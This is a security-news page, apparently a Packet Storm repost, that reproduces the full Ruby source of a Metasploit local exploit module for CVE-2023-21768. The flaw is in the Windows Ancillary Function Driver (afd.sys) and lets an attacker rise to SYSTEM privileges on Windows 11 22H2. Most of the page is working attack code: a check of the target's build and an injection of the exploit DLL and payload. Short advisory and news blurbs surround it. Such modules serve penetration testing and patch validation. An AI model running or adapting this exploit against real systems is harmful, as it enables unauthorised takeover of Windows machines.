Security
Headlines
HeadlinesLatestCVEs

Headline

Ancillary Function Driver (AFD) For Winsock Privilege Escalation

A vulnerability exists in the Windows Ancillary Function Driver for Winsock (afd.sys) can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. Due to a flaw in AfdNotifyRemoveIoCompletion, it is possible to create an arbitrary kernel Write-Where primitive, which can be used to manipulate internal I/O ring structures and achieve local privilege escalation. This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in January 2023 updates).

Packet Storm
#vulnerability#windows#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  include Msf::Post::Windows::FileInfo  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Ancillary Function Driver (AFD) for WinSock Elevation of Privilege',          'Description' => %q{            A vulnerability exists in the Windows Ancillary Function Driver for Winsock            (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of            NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is            possible to create an arbitrary kernel Write-Where primitive, which can be used            to manipulate internal I/O ring structures and achieve local privilege            escalation.            This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in            January 2023 updates).          },          'License' => MSF_LICENSE,          'Author' => [            'chompie', # Github PoC            'b33f', # Github PoC            'Yarden Shafir', # I/O Ring R/W primitive PoC            'Christophe De La Fuente' # Metasploit module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'Privileged' => true,          'Targets' => [            [ 'Windows 11 22H2 x64', { 'Arch' => ARCH_X64 } ]          ],          'Payload' => {            'DisableNops' => true          },          'References' => [            [ 'CVE', '2023-21768' ],            [ 'URL', 'https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768' ],            [ 'URL', 'https://github.com/yardenshafir/IoRingReadWritePrimitive' ]          ],          'DisclosureDate' => '2023-01-10',          'DefaultTarget' => 0,          'Notes' => {            'Stability' => [],            'Reliability' => [ REPEATABLE_SESSION ],            'SideEffects' => []          }        }      )    )  end  def check    unless session.platform == 'windows'      return Exploit::CheckCode::Safe('Only Windows systems are affected')    end    major, minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntoskrnl.exe')    vprint_status("Windows Build Number = #{build}.#{revision}")    unless major == 6 && minor == 2 && build == 22621      return CheckCode::Safe('The exploit only supports Windows 11 22H2')    end    if revision > 963      return CheckCode::Safe("This Windows host seems to be patched (build 22621.#{revision})")    end    CheckCode::Appears  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21768', 'CVE-2023-21768.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend

Related news

CVE-2023-21768

Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability.

Microsoft Patch Tuesday for January 2023 — Snort rules and prominent vulnerabilities

Microsoft released its monthly security update on Tuesday, disclosing 101 vulnerabilities. Of these vulnerabilities, 11 are classified as “Critical”, 89 are classified as “Important”, no vulnerability classified as “Moderate.”

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution